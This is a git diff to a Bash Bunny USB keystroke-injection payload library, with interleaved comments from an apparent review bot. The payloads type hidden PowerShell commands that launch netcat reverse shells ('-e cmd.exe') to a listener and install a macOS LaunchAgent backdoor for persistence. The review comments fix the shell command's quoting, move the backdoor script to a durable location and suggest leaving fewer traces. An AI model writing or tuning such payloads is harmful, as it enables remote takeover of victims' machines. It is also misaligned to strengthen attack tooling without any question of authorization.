diff --git a/payloads/library/execution/RAZ_VBScript/a.vbs b/payloads/library/execution/RAZ_VBScript/a.vbs index fd1a23a6..7d669b42 100644 --- a/payloads/library/execution/RAZ_VBScript/a.vbs +++ b/payloads/library/execution/RAZ_VBScript/a.vbs @@ -3,7 +3,7 @@ Option Explicit '============================================================================== ' Title: a.vbs ' Author: RalphyZ -' Version: 1.0 +' Version: 1.1 ' Target: Windows 7+ ' ' Description: @@ -16,7 +16,8 @@ Option Explicit ' listeners while doing a PenTest, and grab multiple reverse ' shells in one trip. Uncomment that if you want the auto-increment ' -' Note: You must put the netcat executable in the strReverseShellPath directory +' Note: You must put the netcat executable in the switch directory with this +' script in order for it to work '============================================================================== ' Declare Constants @@ -26,14 +27,11 @@ Const ForWriting = 2 ' Declare Global Variables Dim strListenerPort, strNewListenerPort, strListenerIP Dim objFSO, objFile, strCurrentDirectory -Dim strNetCatEXE, strReverseShellPath, strListnerPortFile, strListenerIPFile +Dim strNetCatEXE, strListnerPortFile, strListenerIPFile ' The netcat executable name strNetCatEXE = "nc.exe" -' The folder location -strReverseShellPath = "\payloads\library\RAZ_ReverseShell\" - ' The file containing the listener port strListnerPortFile = "listener_port.txt" @@ -43,7 +41,11 @@ strListenerIPFile = "listener_ip.txt" ' Create a File System Object Set objFSO = CreateObject("Scripting.FileSystemObject") -strCurrentDirectory = FindCurrentDirectory() +' Set default value +strCurrentDirectory = "" + +' The folder location +FindCurrentDirectory ' Read the Host IP Address (where the listener resides) ReadHostIP 
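Review bot: The new default `strCurrentDirectory = ""` is never checked after `FindCurrentDirectory` returns, so when nc.exe is found on no drive the script carries on into `ReadHostIP` and, presumably, `StartNetCat` with an empty path. Add a guard straight after the call, e.g. `If strCurrentDirectory = "" Then WScript.Quit 1` (optionally after a `WScript.Echo` saying nc.exe was not found). The old `FindCurrentDirectory()` had the same gap, but this hunk is the one that makes the empty-string case explicit. `ReadHostIP` and `StartNetCat` are outside the hunk, so I cannot confirm they do not guard it themselves.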
@@ -64,20 +66,21 @@ StartNetCat ' Return Value: None ' Description: Find the netcat executable '============================================================================== -Function FindCurrentDirectory +sub FindCurrentDirectory Dim objDrives, d - - ' Set default return value - FindCurrentDirectory = "" - + ' Search all drives for the netcat exe Set objDrives = objFSO.Drives - For Each d in objDrives - If (objFSO.FileExists(d + strReverseShellPath + strNetCatEXE)) Then - FindCurrentDirectory = d + strReverseShellPath + For Each d in objDrives + If (objFSO.FileExists(d + "\payloads\switch1\" + strNetCatEXE)) Then + strCurrentDirectory = d + "\payloads\switch1\" + exit sub + ElseIf (objFSO.FileExists(d + "\payloads\switch2\" + strNetCatEXE)) Then + strCurrentDirectory = d + "\payloads\switch2\" + exit sub End if Next -End Function +End Sub '============================================================================== ' Name: ReadHostIP diff --git a/payloads/library/execution/RAZ_VBScript/payload.txt b/payloads/library/execution/RAZ_VBScript/payload.txt index b395f94f..ab24bd09 100644 --- a/payloads/library/execution/RAZ_VBScript/payload.txt +++ b/payloads/library/execution/RAZ_VBScript/payload.txt 
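Review bot: The two `If`/`ElseIf` branches in the new `FindCurrentDirectory` differ only in the folder name, and the switch list is now hard-coded in two places inside the sub; iterating over the switch folders keeps one copy of the path logic and makes adding a third switch a one-token change. Behaviour is otherwise the same (first drive/folder that has `strNetCatEXE` wins, global `strCurrentDirectory` set, early exit). Rewritten sub below; the header comment still says "Return Value: None" which now matches.
```vbscript
Sub FindCurrentDirectory
    Dim objDrives, d, strSwitch
    ' Search every drive for the netcat exe under each switch folder
    Set objDrives = objFSO.Drives
    For Each d In objDrives
        For Each strSwitch In Array("switch1", "switch2")
            If (objFSO.FileExists(d + "\payloads\" + strSwitch + "\" + strNetCatEXE)) Then
                strCurrentDirectory = d + "\payloads\" + strSwitch + "\"
                Exit Sub
            End If
        Next
    Next
End Sub
```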
@@ -2,34 +2,45 @@ # # Title: RAZ_VBScript # Author: RalphyZ -# Version: 1.0 +# Version: 1.1 # Target: Windows 7+ # Dependencies: VBScript (a.vbs) in the switch folder with this file # # Description: Executes a VBScript, concealed in a hidden PowerShell window # # Colors: -# Green.....................Working -# White.....................Completed without error -# Light-Blue (blinking).....a.vbs was not found +# | Status | Color | Description | +# | ---------- | ------------------------------| ------------------------------------------------ | +# | SETUP | Magenta solid | Setting attack mode, getting the switch position | +# | FAIL | Red slow blink | Could not find the a.vbs script | +# | ATTACK | Yellow single blink | Running the VBScript | +# | FINISH | Green blink followed by SOLID | Script is finished | -LED G +# Magenta solid +LED SETUP + +# Set the attack mode ATTACKMODE HID STORAGE # Get the switch position -source bunny_helpers.sh +GET SWITCH_POSITION -# Check if a.vbs is present -if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/a.vbs" ] ; then - LED B G 100 + Check if a.vbs is present + if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/a.vbs" ] ; then + LED FAIL exit 1 fi +# Start the attack - yellow single blink +LED ATTACK + # Run the VBScript QUACK GUI r QUACK DELAY 100 -QUACK STRING powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\a.vbs')" +QUACK STRING powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\a.vbs') -e cmd.exe" QUACK ENTER -# Green LED for finished -LED R G B \ No newline at end of file + +# Green 1000ms VERYFAST blink followed by SOLID +LED FINISH +exit 0 \ No newline at end of file diff --git a/payloads/library/execution/RAZ_VBScript/readme.md b/payloads/library/execution/RAZ_VBScript/readme.md new file mode 100644 index 00000000..3e0287ef --- /dev/null +++ b/payloads/library/execution/RAZ_VBScript/readme.md 
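Review bot: The rewritten `QUACK STRING` line appends `-e cmd.exe` to the a.vbs invocation, which looks carried over from the netcat payload: a.vbs as shown in this commit never reads `WScript.Arguments`, so the extra tokens are typed into the Run box for nothing and only lengthen the trace left behind; drop them and end the line with `...\\a.vbs')"`. The added `+ Check if a.vbs is present` line is also rendered without its leading `#` — if that is how the file is written, bash will try to run `Check` as a command (command not found) before the test executes, so it should read `# Check if a.vbs is present`, with the following `if`/`fi` de-indented to match the rest of the script.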
@@ -0,0 +1,31 @@
+# RAZ_VBScript
+* Author: RalphyZ
+* Version: 1.1
+* Target: Windows 7+
+* Category: Execution
+* Attackmode: HID, STORAGE
+
+## Change Log
+| Version | Changes |
+| ------- | ------------------------------|
+| 1.1 | Updated for firmware 1.1 |
+| 1.0 | Initial release |
+
+## Dependencies
+The following files must exist in the switch folder:
+
+a.vbs - VBScript to be executed in a hidden Powershell window
+
+## Description
+VBScript (a.vbs) in the switch folder with this file
+
+## Configuration
+None
+
+## Colors
+| Status | Color | Description |
+| --------- | ------------------------------| ------------------------------------------------ |
+| SETUP | Magenta solid | Setting attack mode, getting the switch position |
+| FAIL | Red slow blink | Could not find the a.vbs script |
+| ATTACK | Yellow single blink | Running the VBScript |
+| FINISH | Green blink followed by SOLID | Script is finished |
\ No newline at end of file
diff --git a/payloads/library/prank/RAZ_ThemeChanger/payload.txt b/payloads/library/prank/RAZ_ThemeChanger/payload.txt
new file mode 100644
index 00000000..58e61540
--- /dev/null
+++ b/payloads/library/prank/RAZ_ThemeChanger/payload.txt
@@ -0,0 +1,48 @@
+#!/bin/bash
+#
+# Title: Change windows theme
+# Author: sil3n7h
+# Version: 1.2
+# Target: Windows 7+
+#
+# Executes theme file (theme.themepack) from the RAZ_ThemeChanger folder
+# in the payloads library of the Bash Bunny USB Disk partition.
+#
+# Colors:
+# | Status | Color | Description |
+# | ---------- | ------------------------------| ------------------------------------------------ |
+# | SETUP | Magenta solid | Setting attack mode, getting the switch position |
+# | FAIL1 | Red slow blink | Could not find the theme.themepack file |
+# | ATTACK | Yellow single blink | Running the VBScript |
+# | FINISH | Green blink followed by SOLID | Script is finished |
+
+# Magenta solid
+LED SETUP
+
+# Get the switch position
+GET SWITCH_POSITION
+
+# Check for all the files - error if not found. If found, put into variables
+if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/theme.themepack" ] ; then
+ LED FAIL1
+ exit 1
+fi
+
+# Set the attack mode to HID and STORAGE
+ATTACKMODE HID STORAGE
+
+# Yellow single blink
+LED ATTACK
+
+# Run the command to change the theme
+QUACK GUI r
+QUACK DELAY 100
+QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\theme.themepack')"
+QUACK ENTER
+
+# Wait a bit so that the correct window closes
+QUACK DELAY 15000
+QUACK ALT F4
+
+# Green LED for finished
+LED FINISH
\ No newline at end of file
diff --git a/payloads/library/prank/RAZ_ThemeChanger/readme.md b/payloads/library/prank/RAZ_ThemeChanger/readme.md
new file mode 100644
index 00000000..7d9f2645
--- /dev/null
+++ b/payloads/library/prank/RAZ_ThemeChanger/readme.md
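Review bot: The color table entry `# | ATTACK | Yellow single blink | Running the VBScript |` is copied from the RAZ_VBScript payload; this script types a PowerShell command that opens a themepack and runs no VBScript, so it should read something like `# | ATTACK | Yellow single blink | Applying the theme pack |`. Separately, `QUACK DELAY 15000` followed by `QUACK ALT F4` closes whichever window has focus 15 s later, not specifically the window the themepack opened, so the comment should state the assumption rather than hide it: `# Assumes the theme window still has focus after 15 s; ALT F4 closes the foreground window`.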
@@ -0,0 +1,34 @@
+# RAZ_ThemeChanger
+* Author: sil3n7h
+* Version: 1.2
+* Target: Windows 7+
+* Category: Prank
+* Attackmode: HID, STORAGE
+
+## Change Log
+| Version | Changes |
+| ------- | ---------------------------------------|
+| 1.2 | Updated docs and check for themepack |
+| 1.1 | Updated for firmware 1.1 |
+| 1.0 | Initial release |
+
+## Dependencies
+The following files must exist in the switch folder:
+
+theme.themepack - The Windows theme file used to set the wallpaper and colors of the screen.
+
+Note: themepack files are windows zipfiles which contain wallpapers and other files (screensavers, sounds, etc). You can export your own themepack using Windows GUIs. Just look it up `exporting a windows themepack`.
+
+## Description
+Executes theme file (theme.themepack) from the RAZ_ThemeChanger folder in the payloads library of the Bash Bunny USB Disk partition.
+
+## Configuration
+None
+
+## Colors
+| Status | Color | Description |
+| --------- | ------------------------------| ------------------------------------------------ |
+| SETUP | Magenta solid | Setting attack mode, getting the switch position |
+| FAIL1 | Red slow blink | Could not find the theme.themepack file |
+| ATTACK | Yellow single blink | Running the VBScript |
+| FINISH | Green blink followed by SOLID | Script is finished |
\ No newline at end of file
diff --git a/payloads/library/remote_access/RAZ_MacReverseShell/payload.txt b/payloads/library/remote_access/RAZ_MacReverseShell/payload.txt
index 8c370623..2b384024 100644
--- a/payloads/library/remote_access/RAZ_MacReverseShell/payload.txt
+++ b/payloads/library/remote_access/RAZ_MacReverseShell/payload.txt
@@ -2,7 +2,7 @@
 #
 # Title: RAZ_MacReverseShell
 # Author: RalphyZ
-# Version: 1.1
+# Version: 1.2
 # Target: Mac OSX
 # Dependencies: None
 #
@@ -12,8 +12,14 @@ # user-defined interval # # Colors: -# Green (blinking)..........Working -# White.....................Completed without error +# | Status | Color | Description | +# | ---------- | ------------------------------| ------------------------------------------------ | +# | SETUP | Magenta solid | Setting attack mode, getting the switch position | +# | ATTACK | Yellow single blink | Running the VBScript | +# | FINISH | Green blink followed by SOLID | Script is finished | + +#Magenta solid +LED SETUP # Edit this to point to the NetCat Listener LISTENER_IP="192.168.1.100" @@ -24,15 +30,15 @@ FREQUENCY="60" #----Proceed with Caution------------------------------------------------------ -# Green blinking LED -LED G 100 - # Human Interface Device ATTACKMODE HID # Emulate the Ducky - QUACK! QUACK DEFAULT_DELAY 300 +# Start the attack - yellow single blink +LED ATTACK + # Start the Mac Terminal QUACK COMMAND SPACE QUACK STRING terminal @@ -53,7 +59,7 @@ QUACK ENTER QUACK DELAY 500 # Add to the Launch Agents -QUACK STRING printf \"\\\n \\\n \Label\\\n \com.ralphyz.backdoor\\\n \ProgramArguments\\\n \\\n \/bin/sh\\\n \/tmp/s.sh\\\n \\\n \RunAtLoad\\\n \\\n \StartInterval\\\n \${FREQUENCY}\\\n \AbandonProcessGroup\\\n \\\n \\\n\\" \> \~/Library/LaunchAgents/com.ralphyz.backdoor.plist +QUACK STRING printf \"\\\Label\\com.ralphyz.backdoor\\ProgramArguments\\\/bin/sh\\/tmp/s.sh\\\RunAtLoad\\\StartInterval\\${FREQUENCY}\\AbandonProcessGroup\\\\\n\\" \> \~/Library/LaunchAgents/com.ralphyz.backdoor.plist QUACK ENTER QUACK DELAY 500 @@ -64,5 +70,6 @@ QUACK ENTER # Close the Terminal Window QUACK COMMAND q -# White LED for finished -LED R G B +# Green 1000ms VERYFAST blink followed by SOLID +LED FINISH +exit 0 \ No newline at end of file diff --git a/payloads/library/remote_access/RAZ_MacReverseShell/readme.md b/payloads/library/remote_access/RAZ_MacReverseShell/readme.md new file mode 100644 index 00000000..2e02f431 --- /dev/null 
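Review bot: The new color table describes ATTACK as `Running the VBScript`, but this is the macOS payload that types a bash reverse shell into Terminal — there is no VBScript involved. Suggest `# | ATTACK | Yellow single blink | Typing the reverse shell into Terminal |`; the readme added in this same commit repeats the text and should be aligned with it.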
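Review bot: The one-line plist written by the new `printf` still points `ProgramArguments` at `/tmp/s.sh`, so the LaunchAgent only persists until macOS purges /tmp (on reboot or its periodic cleanup) and then fails on every `StartInterval`; writing the script somewhere durable under the user's home (e.g. `~/Library/Application Support/`) would make the persistence the description promises actually hold. `StartInterval` is also a launchd value in seconds, while the readme added in this commit tells the user to set FREQUENCY in minutes — one of the two needs to change, e.g. comment the variable as `# Seconds between runs (launchd StartInterval)`. As rendered here the plist's XML tags are missing, presumably stripped by the page, so I cannot check the document structure itself.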
+++ b/payloads/library/remote_access/RAZ_MacReverseShell/readme.md
@@ -0,0 +1,39 @@
+# RAZ_MacReverseShell
+* Author: RalphyZ
+* Version: Version 1.1.1
+* Target: Mac OSX
+* Category: Reverse Shell
+* Attackmode: HID
+
+## Change Log
+| Version | Changes |
+| ------- | ---------------------------------------- |
+| 1.1.1 | Updated for firmware 1.1.1 |
+| 1.1 | Added variables for easier customization |
+| 1.0 | Initial release |
+
+## Dependencies
+None
+
+## Description
+Starts a terminal window on a Mac,then creates a bash reverse shell inside a script, /tmp/s.sh. It then adds the script to the Launch Agent - establishing persistence - running at startup
+
+## Configuration
+Set the location of your listener:
+
+LISTENER_IP="192.168.1.100"
+
+LISTENER_PORT="4444"
+
+
+Set the frequency you want the script to run (in minutes)
+
+FREQUENCY="60"
+
+## Colors
+| Status | Color | Description |
+| --------- | ------------------------------| ------------------------------------------------ |
+| SETUP | Magenta solid | Setting attack mode, getting the switch position |
+| ATTACK | Yellow single blink | Running the VBScript |
+| FINISH | Green blink followed by SOLID | Script is finished |
+
diff --git a/payloads/library/remote_access/RAZ_ReverseShell/payload.txt b/payloads/library/remote_access/RAZ_ReverseShell/payload.txt
index 8b71a3d0..f97c94d7 100644
--- a/payloads/library/remote_access/RAZ_ReverseShell/payload.txt
+++ b/payloads/library/remote_access/RAZ_ReverseShell/payload.txt
@@ -13,63 +13,69 @@ # Intentionally, this script leaves a trace in the Run Box # # Colors: -# Green.....................Working -# White.....................Completed without error -# White (blinking)..........Incrementing the port in listener_port.txt -# Blue (blinking)...........listener_port.txt was not found -# Light-Blue (blinking).....listener_ip.txt was not found -# Amber (blinking)..........nc.exe was not found +# | Status | Color | Description | +# | ---------- | ------------------------------| ------------------------------------------------ | +# | SETUP | Magenta solid | Setting attack mode, getting the switch position | +# | FAIL1 | Red slow blink | Could not find the listener_port.txt file | +# | FAIL2 | Red fast blink | Could not find the listener_ip.txt file | +# | FAIL3 | Red very fast blink | Could not find the nc.exe file | +# | SPECIAL | Cyan inverted single blink | Incrementing the port in listener_port.txt | +# | ATTACK | Yellow single blink | Running the VBScript | +# | FINISH | Green blink followed by SOLID | Script is finished | +# Magenta solid +LED SETUP # Change this if you want to enable auto_increment of the netcat port # If true, the port number is increased by 1 everytime the script runs # This is good for Red Teams doing PenTesting on multiple computers auto_increment=false -LED G +# Set attack mode to HID and Storage ATTACKMODE HID STORAGE -LANGUAGE='us' - # Get the switch position -source bunny_helpers.sh - +GET SWITCH_POSITION # Check for all the files - error if not found. If found, put into variables if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt" ] ; then - LED B 100 + LED FAIL1 exit 1 else my_port=`cat /root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt` fi if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/listener_ip.txt" ] ; then - LED B G 100 + LED FAIL2 exit 1 else my_ip=`cat /root/udisk/payloads/${SWITCH_POSITION}/listener_ip.txt` fi if [ ! 
-f "/root/udisk/payloads/${SWITCH_POSITION}/nc.exe" ] ; then - LED R G 100 + LED FAIL3 exit 1 fi +# Start the attack - yellow single blink +LED ATTACK + # Execute the powershell command in the run box with the appropriate variables QUACK GUI r QUACK DELAY 100 -QUACK STRING powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\nc.exe') -nv ${my_ip} ${my_port} -e cmd.exe" +QUACK STRING powershell -WindowStyle Hidden \".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\nc.exe') -nv ${my_ip} ${my_port} -e cmd.exe\" QUACK ENTER + # If auto_increment, then update the listener_port file if [ "$auto_increment" = true ] ; then - LED R G B 100 + LED SPECIAL echo $((my_port + 1)) > /root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt # Allow the write to sync to the USB sleep 1 fi -# Signal everything went OK - white -LED R G B +# Green 1000ms VERYFAST blink followed by SOLID +LED FINISH exit 0 diff --git a/payloads/library/remote_access/RAZ_ReverseShell/readme.md b/payloads/library/remote_access/RAZ_ReverseShell/readme.md new file mode 100644 index 00000000..f2f2aa3d --- /dev/null +++ b/payloads/library/remote_access/RAZ_ReverseShell/readme.md 
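Review bot: Moving the PowerShell command out of double quotes and escaping only the outer quotes as `\"` breaks the quoting on the new `QUACK STRING` line: bash now performs quote removal on `'label=''BashBunny'''` and `'payloads\\${SWITCH_POSITION}\\nc.exe'`, so — unless the firmware's QUACK re-reads the raw line, which I cannot see here — the typed text becomes `-f label=BashBunny` and `payloads\\switch1\\nc.exe` (no WQL quotes, doubled backslashes) and `gwmi` fails before nc.exe is ever located. Keep the whole argument in double quotes and escape only the inner ones: `QUACK STRING "powershell -WindowStyle Hidden \".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\nc.exe') -nv ${my_ip} ${my_port} -e cmd.exe\""`. That also matches the VBScript and ThemeChanger payloads in this commit, which still wrap the command in double quotes. This hunk starts on the previous line; the `LED ATTACK`/`QUACK` sequence is otherwise fine.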
@@ -0,0 +1,44 @@
+# RAZ_ReverseShell
+* Author: RalphyZ
+* Version: 1.1
+* Target: Windows 7+
+* Category: Reverse Shell
+* Attackmode: HID, STORAGE
+
+## Change Log
+| Version | Changes |
+| ------- | ------------------------------|
+| 1.1 | Updated for firmware 1.1 |
+| 1.0 | Initial release |
+
+## Dependencies
+The following files must exist in the switch folder:
+
+nc.exe - Windows binary for netcat with the -e flag
+
+Find nc.exe on Kali, or on NMap's website: http://nmap.org/ncat
+
+listener_port.txt - The Port number for the netcat listener
+
+listener_ip.txt - The IP Address for the netcat listener
+
+## Description
+Executes a netcat reverse cmd shell at a given IP and Port. This script leaves a trace in the Run Box. The script can auto-increment the listener port so that the PenTester can create several listeners, and target multiple machines while on a walkabout in an office.
+
+## Configuration
+Set the location of your listener in the listener_ip and listener_port text files.
+
+If you want the listener port to auto-increment, set:
+
+auto_increment=true
+
+## Colors
+| Status | Color | Description |
+| ---------- | ------------------------------| ------------------------------------------------ |
+| SETUP | Magenta solid | Setting attack mode, getting the switch position |
+| FAIL1 | Red slow blink | Could not find the listener_port.txt file |
+| FAIL2 | Red fast blink | Could not find the listener_ip.txt file |
+| FAIL3 | Red very fast blink | Could not find the nc.exe file |
+| SPECIAL | Cyan inverted single blink | Incrementing the port in listener_port.txt |
+| ATTACK | Yellow single blink | Running the VBScript |
+| FINISH | Green blink followed by SOLID | Script is finished |
\ No newline at end of file